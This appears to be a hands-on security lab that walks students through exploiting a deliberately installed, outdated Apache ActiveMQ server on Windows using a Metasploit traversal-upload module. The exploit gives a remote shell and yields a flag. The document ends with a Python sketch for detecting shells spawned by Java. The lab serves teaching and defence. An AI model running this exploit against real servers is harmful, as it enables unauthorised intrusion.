H 310: Metasploit v. ActiveMQ (20 pts)

What you need

Purpose

To practice using Metasploit to exploit a vulnerable Windows application.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.

Type FIREWALL.

In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing Java

On your Windows system, in Firefox, go to
https://java.com
Click the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".

Installing Apache ActiveMQ v5.11.0

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your Windows system, in Firefox, go to:

https://activemq.apache.org/activemq-5011000-release
Download the apache-activemq-5.11.0-bin.zip file, as shown below.

You will need to allow the download with a potential security risk in Firefox.

Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All...", then click Extract.

An "apache-activemq-5.11.0-bin" window opens. In the address bar of Windows Explorer, type CMD and press Enter. This opens a Command Prompt in that folder.

Starting ActiveMQ

In the Command Prompt window, execute these commands:
cd apache-activemq-5.11.0
bin\activemq.bat start
ActiveMQ starts, showing "ActiveMQ WebConsole available at http://0.0.0.0:8161/" as shown below.


Task 2: Preparing the Debian Server

Installing Metasploit

In an SSH session to your Debian server, execute these commands:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Metasploit installs, as shown below.

Installing Nmap

Execute this command:
sudo apt install nmap
Enter y to install the package.

Nmap installs, as shown below.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
sudo nmap -sV -p8161 192.168.100.2
You should see the port open, as shown below.


Task 3: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Debian server, execute this command:
msfconsole -q
It asks if you want to set up a database. Reply no.

At the msf5 > prompt, execute this command:

search activemq
A list of exploits appears, as shown below.

Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.

Selecting Options and Target

At the msf5 > prompt, execute these commands:
use exploit/windows/http/apache_activemq_traversal_upload
show options
The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below.

At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:

set RHOSTS 192.168.100.3
set LHOST 192.168.100.1
exploit
You get a shell, as shown below. Press Enter to see a Windows prompt.

H 310.1: Java Module (20 pts)

In the shell, execute this command:
tasklist /m java*
Find the Module name, which is covered by a green box in the image below. That's the flag.
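
Seen from the Windows side, the shell obtained in Task 3 is a command interpreter running under the ActiveMQ Java process, and the tasklist command is one of its children. The following detection sketch is an added example, not part of the original lab. It assumes process-creation events with Sysmon Event ID 1 field names (ProcessId, ParentProcessId, Image, CommandLine) and assumes the shell is started directly by java.exe; the sample events, PIDs and paths are constructed.

```python
from pathlib import PureWindowsPath

JAVA = {"java.exe", "javaw.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events in chronological order (not captured
# from a real host). The java.exe -> cmd.exe chain is an assumption about how
# the lab shell appears in the process tree.
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 800,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 3000, "ParentProcessId": 1200,   # admin opens Command Prompt
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ProcessId": 3400, "ParentProcessId": 3000,   # activemq.bat starts Java
     "Image": r"C:\Program Files\Java\jre1.8.0_251\bin\java.exe",
     "CommandLine": "java.exe -jar activemq.jar start"},
    {"ProcessId": 4100, "ParentProcessId": 3400,   # interpreter under Java
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ProcessId": 4200, "ParentProcessId": 4100,   # command typed in the shell
     "Image": r"C:\Windows\System32\tasklist.exe",
     "CommandLine": "tasklist /m java*"},
    {"ProcessId": 4300, "ParentProcessId": 1200,   # unrelated desktop activity
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]


def basename(image):
    """Lower-cased executable name from a Windows path."""
    return PureWindowsPath(image).name.lower()


def find_suspicious(events):
    """Return (pid, image, reason) for interpreters started by Java
    and for every later process descended from such an interpreter."""
    images = {}      # pid -> executable name, built as events arrive
    tainted = set()  # pids that belong to a flagged process tree
    alerts = []
    for ev in events:
        pid, ppid = ev["ProcessId"], ev["ParentProcessId"]
        name = basename(ev["Image"])
        images[pid] = name
        if images.get(ppid) in JAVA and name in INTERPRETERS:
            tainted.add(pid)
            alerts.append((pid, name, "interpreter spawned by Java"))
        elif ppid in tainted:
            tainted.add(pid)
            alerts.append((pid, name, "descendant of flagged interpreter"))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_EVENTS):
        print(alert)
```

The legitimate start of ActiveMQ (cmd.exe launching java.exe) is not flagged, because the rule keys on Java being the parent, not the child. PID reuse is not handled in this sketch.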

Posted 5-21-2020
Flag number fixed 8-4-20
Download link and CMD opening process updated 7-19-23